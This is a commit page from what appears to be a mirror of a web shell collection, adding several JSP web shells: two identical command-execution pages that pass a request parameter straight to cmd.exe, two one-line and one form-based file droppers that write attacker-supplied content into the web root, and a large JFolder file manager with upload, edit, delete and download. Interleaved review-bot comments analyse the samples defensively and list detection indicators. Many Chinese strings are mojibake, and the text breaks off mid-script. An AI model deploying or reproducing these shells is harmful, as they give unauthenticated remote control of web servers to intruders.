mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
update
php shell and jsp shell
parent
5ba51580de
commit
df6d55ad4f
29 changed files with 7756 additions and 0 deletions
3312
jsp/0000.jsp
Normal file
3312
jsp/0000.jsp
Normal file
File diff suppressed because it is too large
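--- a/jsp/1.jsp
+++ b/jsp/1.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+<HTML><BODY>
+<FORM METHOD="POST" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
+Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr); disr = dis.readLine(); }
+}
+%>
+</pre>
+</BODY></HTML>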
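Review bot: jsp/1.jsp is committed as a directly deployable `.jsp` with nothing that marks it as a malware sample, and the scriptlet hands `request.getParameter("cmd")` to `Runtime.getRuntime().exec("cmd.exe /c " + …)` with no authentication, so any servlet container that serves this checkout exposes command execution as the server account. For a sample collection I would keep the bytes untouched (so hashes still match) but store the file under a non-executable name or inside an archive. I would also add an index entry recording its family (`JSP_KIT` / `cmd.jsp` per the header comment), a SHA-256, and the static indicator a scanner should key on: a request parameter flowing into `Runtime.exec`. jsp/102.jsp appears line-for-line identical to this file; keep one copy and list the second name in the index rather than committing the duplicate.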
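--- a/jsp/102.jsp
+++ b/jsp/102.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+<HTML><BODY>
+<FORM METHOD="POST" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
+Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr); disr = dis.readLine(); }
+}
+%>
+</pre>
+</BODY></HTML>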
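--- a/jsp/12302.jsp
+++ b/jsp/12302.jsp
@@ -0,0 +1,47 @@
+<%@page contentType="text/html;charset=gb2312"%>
+<%@page import="java.io.*,java.util.*,java.net.*"%>
+<html>
+<head>
+<title>JspDo Code By Xiao.3</title>
+<style type="text/css">
+body { color:red; font-size:12px; background-color:white; }
+</style>
+</head>
+<body>
+<%
+if(request.getParameter("context")!=null)
+{
+String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");
+String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");
+OutputStream pt = null;
+try {
+pt = new FileOutputStream(path);
+pt.write(context.getBytes());
+out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='????????????è????°???????????????é??é??!'>????????????!</font></a>");
+} catch (FileNotFoundException ex2) {
+out.println("<font color='red'>???????¤±è??!</font>");
+} catch (IOException ex) {
+out.println("<font color='red'>???????¤±è??!</font>");
+} finally {
+try {
+pt.close();
+} catch (IOException ex3) {
+out.println("<font color='red'>???????¤±è??!</font>");
+}
+}
+}
+%>
+<form name="frmUpload" method="post" action="">
+<font color="blue">????????????è·????:</font><%out.print(request.getRealPath(request.getServletPath())); %>
+<br>
+<br>
+<font color="blue">????????????è·????:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">
+<br>
+<br>
+??????????????????:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
+<br>
+<br>
+<input type="submit" name="btnSubmit" value="Upload">
+</form>
+</body>
+</html>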
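Review bot: jsp/12302.jsp has no accompanying description, and what it does is easy to miss next to the command shells: the scriptlet writes the `context` parameter to whatever location the `path` parameter names via `new FileOutputStream(path)`, unauthenticated, and the form pre-fills `path` with `getServletContext().getRealPath("/")`. That makes it a file dropper, so the defensive notes worth recording differ from those for the command shells: a web root that the container account cannot write to, and file-integrity monitoring for new `.jsp` files appearing after a POST carrying `path` and `context`. The title and message strings on the `out.println` and `<font>` lines render as mojibake here; if the committed bytes were transcoded from the original gb2312, the sample's hash will no longer match the artefact seen in the wild, which is worth confirming before this is used as a reference.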
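--- a/jsp/IXRbE.jsp
+++ b/jsp/IXRbE.jsp
@@ -0,0 +1 @@
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx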
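Review bot: The one-line scriptlet in jsp/IXRbE.jsp writes the `t` parameter to `application.getRealPath("/") + request.getParameter("f")` with no authentication and no restriction on `f`, so it is an upload stub whose only job is to place a second file in the web root, and nothing in the commit documents that. The literal `xIXRbE.jspx` after the closing `%>` is sent in every response, which presumably serves as a marker for whatever tool planted the file. It is a usable indicator for response or file-content matching and should be noted in a sample index together with a hash. jsp/IXRbE02.jsp appears identical, so the same applies there and one copy would suffice.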
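--- a/jsp/IXRbE02.jsp
+++ b/jsp/IXRbE02.jsp
@@ -0,0 +1 @@
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx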
993
jsp/data.jsp
Normal file
993
jsp/data.jsp
Normal file
|
@ -0,0 +1,993 @@
|
|||
<%
|
||||
/**
|
||||
JFolder V0.9 windows platform
|
||||
@Filename?? JFolder.jsp
|
||||
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
|
||||
|
||||
@Bugs : ?????±??????????????·¨????????
|
||||
*/
|
||||
%>
|
||||
<%@ page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*" %>
|
||||
<%!
|
||||
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
|
||||
String strThisFile="JFolder.jsp";
|
||||
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
|
||||
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
|
||||
String[] strCommand = {"CMD ?ü ??","Command Window"};
|
||||
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
|
||||
String[] strHelp = {"°? ?ú","Help"};
|
||||
String[] strParentFolder = {"????????","Parent Folder"};
|
||||
String[] strCurrentFolder= {"?±?°????","Current Folder"};
|
||||
String[] strDrivers = {"?????÷","Drivers"};
|
||||
String[] strFileName = {"????????","File Name"};
|
||||
String[] strFileSize = {"?????ó??","File Size"};
|
||||
String[] strLastModified = {"×??ó????","Last Modified"};
|
||||
String[] strFileOperation= {"??????×÷","Operations"};
|
||||
String[] strFileEdit = {"????","Edit"};
|
||||
String[] strFileDown = {"????","Download"};
|
||||
String[] strFileCopy = {"????","Move"};
|
||||
String[] strFileDel = {"????","Delete"};
|
||||
String[] strExecute = {"????","Execute"};
|
||||
String[] strBack = {"·???","Back"};
|
||||
String[] strFileSave = {"±???","Save"};
|
||||
|
||||
public class FileHandler
|
||||
{
|
||||
private String strAction="";
|
||||
private String strFile="";
|
||||
void FileHandler(String action,String f)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
public static class UploadMonitor {
|
||||
|
||||
static Hashtable uploadTable = new Hashtable();
|
||||
|
||||
static void set(String fName, UplInfo info) {
|
||||
uploadTable.put(fName, info);
|
||||
}
|
||||
|
||||
static void remove(String fName) {
|
||||
uploadTable.remove(fName);
|
||||
}
|
||||
|
||||
static UplInfo getInfo(String fName) {
|
||||
UplInfo info = (UplInfo) uploadTable.get(fName);
|
||||
return info;
|
||||
}
|
||||
}
|
||||
|
||||
public class UplInfo {
|
||||
|
||||
public long totalSize;
|
||||
public long currSize;
|
||||
public long starttime;
|
||||
public boolean aborted;
|
||||
|
||||
public UplInfo() {
|
||||
totalSize = 0l;
|
||||
currSize = 0l;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public UplInfo(int size) {
|
||||
totalSize = size;
|
||||
currSize = 0;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public String getUprate() {
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
if (time != 0) {
|
||||
long uprate = currSize * 1000 / time;
|
||||
return convertFileSize(uprate) + "/s";
|
||||
}
|
||||
else return "n/a";
|
||||
}
|
||||
|
||||
public int getPercent() {
|
||||
if (totalSize == 0) return 0;
|
||||
else return (int) (currSize * 100 / totalSize);
|
||||
}
|
||||
|
||||
public String getTimeElapsed() {
|
||||
long time = (System.currentTimeMillis() - starttime) / 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
public String getTimeEstimated() {
|
||||
if (currSize == 0) return "n/a";
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
time = totalSize * time / currSize;
|
||||
time /= 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public class FileInfo {
|
||||
|
||||
public String name = null, clientFileName = null, fileContentType = null;
|
||||
private byte[] fileContents = null;
|
||||
public File file = null;
|
||||
public StringBuffer sb = new StringBuffer(100);
|
||||
|
||||
public void setFileContents(byte[] aByteArray) {
|
||||
fileContents = new byte[aByteArray.length];
|
||||
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||||
}
|
||||
}
|
||||
|
||||
// A Class with methods used to process a ServletInputStream
|
||||
public class HttpMultiPartParser {
|
||||
|
||||
private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||||
private final int ONE_MB = 1024 * 1;
|
||||
|
||||
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||||
int clength) throws IllegalArgumentException, IOException {
|
||||
if (is == null) throw new IllegalArgumentException("InputStream");
|
||||
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||||
"\"" + boundary + "\" is an illegal boundary indicator");
|
||||
boundary = "--" + boundary;
|
||||
StringTokenizer stLine = null, stFields = null;
|
||||
FileInfo fileInfo = null;
|
||||
Hashtable dataTable = new Hashtable(5);
|
||||
String line = null, field = null, paramName = null;
|
||||
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||||
boolean isFile = false;
|
||||
if (saveFiles) { // Create the required directory (including parent dirs)
|
||||
File f = new File(saveInDir);
|
||||
f.mkdirs();
|
||||
}
|
||||
line = getLine(is);
|
||||
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||||
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||||
while (line != null) {
|
||||
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
stLine = new StringTokenizer(line, ";\r\n");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
line = stLine.nextToken().toLowerCase();
|
||||
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||||
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
fileInfo = new FileInfo();
|
||||
stFields.nextToken();
|
||||
paramName = stFields.nextToken();
|
||||
isFile = false;
|
||||
if (stLine.hasMoreTokens()) {
|
||||
field = stLine.nextToken();
|
||||
stFields = new StringTokenizer(field, "=\"");
|
||||
if (stFields.countTokens() > 1) {
|
||||
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||||
fileInfo.name = paramName;
|
||||
String value = stFields.nextToken();
|
||||
if (value != null && value.trim().length() > 0) {
|
||||
fileInfo.clientFileName = value;
|
||||
isFile = true;
|
||||
}
|
||||
else {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
boolean skipBlankLine = true;
|
||||
if (isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
if (line.trim().length() < 1) skipBlankLine = false;
|
||||
else {
|
||||
stLine = new StringTokenizer(line, ": ");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in third line");
|
||||
stLine.nextToken(); // Content-Type
|
||||
fileInfo.fileContentType = stLine.nextToken();
|
||||
}
|
||||
}
|
||||
if (skipBlankLine) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
}
|
||||
if (!isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
dataTable.put(paramName, line);
|
||||
// If parameter is dir, change saveInDir to dir
|
||||
if (paramName.equals("dir")) saveInDir = line;
|
||||
line = getLine(is);
|
||||
continue;
|
||||
}
|
||||
try {
|
||||
UplInfo uplInfo = new UplInfo(clength);
|
||||
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
|
||||
OutputStream os = null;
|
||||
String path = null;
|
||||
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||||
fileInfo.clientFileName));
|
||||
else os = new ByteArrayOutputStream(ONE_MB);
|
||||
boolean readingContent = true;
|
||||
byte previousLine[] = new byte[2 * ONE_MB];
|
||||
byte temp[] = null;
|
||||
byte currentLine[] = new byte[2 * ONE_MB];
|
||||
int read, read3;
|
||||
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||||
line = null;
|
||||
break;
|
||||
}
|
||||
while (readingContent) {
|
||||
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||||
line = null;
|
||||
uplInfo.aborted = true;
|
||||
break;
|
||||
}
|
||||
if (compareBoundary(boundary, currentLine)) {
|
||||
os.write(previousLine, 0, read - 2);
|
||||
line = new String(currentLine, 0, read3);
|
||||
break;
|
||||
}
|
||||
else {
|
||||
os.write(previousLine, 0, read);
|
||||
uplInfo.currSize += read;
|
||||
temp = currentLine;
|
||||
currentLine = previousLine;
|
||||
previousLine = temp;
|
||||
read = read3;
|
||||
}//end else
|
||||
}//end while
|
||||
os.flush();
|
||||
os.close();
|
||||
if (!saveFiles) {
|
||||
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||||
fileInfo.setFileContents(baos.toByteArray());
|
||||
}
|
||||
else fileInfo.file = new File(path);
|
||||
dataTable.put(paramName, fileInfo);
|
||||
uplInfo.currSize = uplInfo.totalSize;
|
||||
}//end try
|
||||
catch (IOException e) {
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return dataTable;
|
||||
}
|
||||
|
||||
/**
|
||||
* Compares boundary string to byte array
|
||||
*/
|
||||
private boolean compareBoundary(String boundary, byte ba[]) {
|
||||
byte b;
|
||||
if (boundary == null || ba == null) return false;
|
||||
for (int i = 0; i < boundary.length(); i++)
|
||||
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Convenience method to read HTTP header lines */
|
||||
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||||
byte b[] = new byte[1024];
|
||||
int read = sis.readLine(b, 0, b.length), index;
|
||||
String line = null;
|
||||
if (read != -1) {
|
||||
line = new String(b, 0, read);
|
||||
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||||
}
|
||||
return line;
|
||||
}
|
||||
|
||||
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||||
String path = null;
|
||||
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||||
"dir or fileName is null");
|
||||
int index = fileName.lastIndexOf('/');
|
||||
String name = null;
|
||||
if (index >= 0) name = fileName.substring(index + 1);
|
||||
else name = fileName;
|
||||
index = name.lastIndexOf('\\');
|
||||
if (index >= 0) fileName = name.substring(index + 1);
|
||||
path = dir + File.separator + fileName;
|
||||
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||||
else return path.replace('/', File.separatorChar);
|
||||
}
|
||||
} //End of class HttpMultiPartParser
|
||||
|
||||
String formatPath(String p)
|
||||
{
|
||||
StringBuffer sb=new StringBuffer();
|
||||
for (int i = 0; i < p.length(); i++)
|
||||
{
|
||||
if(p.charAt(i)=='\\')
|
||||
{
|
||||
sb.append("\\\\");
|
||||
}
|
||||
else
|
||||
{
|
||||
sb.append(p.charAt(i));
|
||||
}
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts some important chars (int) to the corresponding html string
|
||||
*/
|
||||
static String conv2Html(int i) {
|
||||
if (i == '&') return "&";
|
||||
else if (i == '<') return "<";
|
||||
else if (i == '>') return ">";
|
||||
else if (i == '"') return """;
|
||||
else return "" + (char) i;
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts a normal string to a html conform string
|
||||
*/
|
||||
static String htmlEncode(String st) {
|
||||
StringBuffer buf = new StringBuffer();
|
||||
for (int i = 0; i < st.length(); i++) {
|
||||
buf.append(conv2Html(st.charAt(i)));
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
String getDrivers()
|
||||
/**
|
||||
Windows?????????????????ù????????
|
||||
*/
|
||||
{
|
||||
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
|
||||
File roots[]=File.listRoots();
|
||||
for(int i=0;i<roots.length;i++)
|
||||
{
|
||||
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
|
||||
sb.append(roots[i]+"</a> ");
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
static String convertFileSize(long filesize)
|
||||
{
|
||||
//bug 5.09M ????5.9M
|
||||
String strUnit="Bytes";
|
||||
String strAfterComma="";
|
||||
int intDivisor=1;
|
||||
if(filesize>=1024*1024)
|
||||
{
|
||||
strUnit = "MB";
|
||||
intDivisor=1024*1024;
|
||||
}
|
||||
else if(filesize>=1024)
|
||||
{
|
||||
strUnit = "KB";
|
||||
intDivisor=1024;
|
||||
}
|
||||
if(intDivisor==1) return filesize + " " + strUnit;
|
||||
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
|
||||
if(strAfterComma=="") strAfterComma=".0";
|
||||
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
request.setCharacterEncoding("gb2312");
|
||||
String tabID = request.getParameter("tabID");
|
||||
String strDir = request.getParameter("path");
|
||||
String strAction = request.getParameter("action");
|
||||
String strFile = request.getParameter("file");
|
||||
String strPath = strDir + "\\" + strFile;
|
||||
String strCmd = request.getParameter("cmd");
|
||||
StringBuffer sbEdit=new StringBuffer("");
|
||||
StringBuffer sbDown=new StringBuffer("");
|
||||
StringBuffer sbCopy=new StringBuffer("");
|
||||
StringBuffer sbSaveCopy=new StringBuffer("");
|
||||
StringBuffer sbNewFile=new StringBuffer("");
|
||||
|
||||
if((tabID==null) || tabID.equals(""))
|
||||
{
|
||||
tabID = "1";
|
||||
}
|
||||
|
||||
if(strDir==null||strDir.length()<1)
|
||||
{
|
||||
strDir = request.getRealPath("/");
|
||||
}
|
||||
|
||||
|
||||
if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
if(f.length()==0)
|
||||
{
|
||||
sbDown.append("?????ó???? 0 ×???????????????°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
response.setHeader("content-type","text/html; charset=ISO-8859-1");
|
||||
response.setContentType("APPLICATION/OCTET-STREAM");
|
||||
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
|
||||
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
|
||||
out.clearBuffer();
|
||||
int i;
|
||||
while ((i=fileInputStream.read()) != -1)
|
||||
{
|
||||
out.write(i);
|
||||
}
|
||||
fileInputStream.close();
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("del"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
f.delete();
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
|
||||
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
|
||||
sbEdit.append("<input type=hidden name=action value=save >\r\n");
|
||||
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
|
||||
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"\r\n");
|
||||
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
|
||||
String line="";
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbEdit.append(htmlEncode(line)+"\r\n");
|
||||
}
|
||||
sbEdit.append("</textarea>");
|
||||
sbEdit.append("<input type=hidden name=path value="+strDir+">");
|
||||
sbEdit.append("</form>");
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("save"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
|
||||
String strContent=request.getParameter("content");
|
||||
bw.write(strContent);
|
||||
bw.close();
|
||||
}
|
||||
if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
|
||||
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
|
||||
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbCopy.append("?????????? "+strPath+"<p>");
|
||||
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
|
||||
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
|
||||
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> \r\n");
|
||||
sbCopy.append("</form>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
String strDesFile=request.getParameter("file2");
|
||||
if(strDesFile==null || strDesFile.equals(""))
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
File f_des=new File(strDesFile);
|
||||
if(f_des.isFile())
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strTmpFile=strDesFile;
|
||||
if(f_des.isDirectory())
|
||||
{
|
||||
if(!strDesFile.endsWith("\\"))
|
||||
{
|
||||
strDesFile=strDesFile+"\\";
|
||||
}
|
||||
strTmpFile=strDesFile+"cqq_"+strFile;
|
||||
}
|
||||
|
||||
File f_des_copy=new File(strTmpFile);
|
||||
FileInputStream in1=new FileInputStream(f);
|
||||
FileOutputStream out1=new FileOutputStream(f_des_copy);
|
||||
byte[] buffer=new byte[1024];
|
||||
int c;
|
||||
while((c=in1.read(buffer))!=-1)
|
||||
{
|
||||
out1.write(buffer,0,c);
|
||||
}
|
||||
in1.close();
|
||||
out1.close();
|
||||
|
||||
sbSaveCopy.append("???????? ??"+strPath+"<p>");
|
||||
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
|
||||
sbSaveCopy.append("<font color=red>??????????</font>");
|
||||
}
|
||||
}
|
||||
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("newFile"))
|
||||
{
|
||||
String strF=request.getParameter("fileName");
|
||||
String strType1=request.getParameter("btnNewFile");
|
||||
String strType2=request.getParameter("btnNewDir");
|
||||
String strType="";
|
||||
if(strType1==null)
|
||||
{
|
||||
strType="Dir";
|
||||
}
|
||||
else if(strType2==null)
|
||||
{
|
||||
strType="File";
|
||||
}
|
||||
if(!strType.equals("") && !(strF==null || strF.equals("")))
|
||||
{
|
||||
File f_new=new File(strF);
|
||||
if(strType.equals("File") && !f_new.createNewFile())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
if(strType.equals("Dir") && !f_new.mkdirs())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
}
|
||||
}
|
||||
|
||||
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
|
||||
{
|
||||
String tempdir=".";
|
||||
boolean error=false;
|
||||
response.setContentType("text/html");
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
HttpMultiPartParser parser = new HttpMultiPartParser();
|
||||
|
||||
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||||
String bound = request.getContentType().substring(bstart + 8);
|
||||
int clength = request.getContentLength();
|
||||
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
|
||||
if (ht.get("cqqUploadFile") != null)
|
||||
{
|
||||
|
||||
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
|
||||
File f1 = fi.file;
|
||||
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
|
||||
if (info != null && info.aborted)
|
||||
{
|
||||
f1.delete();
|
||||
request.setAttribute("error", "Upload aborted");
|
||||
}
|
||||
else
|
||||
{
|
||||
String path = (String) ht.get("path");
|
||||
if(path!=null && !path.endsWith("\\"))
|
||||
path = path + "\\";
|
||||
if (!f1.renameTo(new File(path + f1.getName())))
|
||||
{
|
||||
request.setAttribute("error", "Cannot upload file.");
|
||||
error = true;
|
||||
f1.delete();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
td,select,input,body{font-size:9pt;}
|
||||
A { TEXT-DECORATION: none }
|
||||
|
||||
#tablist{
|
||||
padding: 5px 0;
|
||||
margin-left: 0;
|
||||
margin-bottom: 0;
|
||||
margin-top: 0.1em;
|
||||
font:9pt;
|
||||
}
|
||||
|
||||
#tablist li{
|
||||
list-style: none;
|
||||
display: inline;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
#tablist li a{
|
||||
padding: 3px 0.5em;
|
||||
margin-left: 3px;
|
||||
border: 1px solid ;
|
||||
background: F6F6F6;
|
||||
}
|
||||
|
||||
#tablist li a:link, #tablist li a:visited{
|
||||
color: navy;
|
||||
}
|
||||
|
||||
#tablist li a.current{
|
||||
background: #EAEAFF;
|
||||
}
|
||||
|
||||
#tabcontentcontainer{
|
||||
width: 100%;
|
||||
padding: 5px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
|
||||
.tabcontent{
|
||||
display:none;
|
||||
}
|
||||
|
||||
</style>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
|
||||
|
||||
////////Stop editting////////////////
|
||||
|
||||
function cascadedstyle(el, cssproperty, csspropertyNS){
|
||||
if (el.currentStyle)
|
||||
return el.currentStyle[cssproperty]
|
||||
else if (window.getComputedStyle){
|
||||
var elstyle=window.getComputedStyle(el, "")
|
||||
return elstyle.getPropertyValue(csspropertyNS)
|
||||
}
|
||||
}
|
||||
|
||||
var previoustab=""
|
||||
|
||||
function expandcontent(cid, aobject){
|
||||
if (document.getElementById){
|
||||
highlighttab(aobject)
|
||||
if (previoustab!="")
|
||||
document.getElementById(previoustab).style.display="none"
|
||||
document.getElementById(cid).style.display="block"
|
||||
previoustab=cid
|
||||
if (aobject.blur)
|
||||
aobject.blur()
|
||||
return false
|
||||
}
|
||||
else
|
||||
return true
|
||||
}
|
||||
|
||||
function highlighttab(aobject){
|
||||
if (typeof tabobjlinks=="undefined")
|
||||
collecttablinks()
|
||||
for (i=0; i<tabobjlinks.length; i++)
|
||||
tabobjlinks[i].style.backgroundColor=initTabcolor
|
||||
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
|
||||
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
|
||||
}
|
||||
|
||||
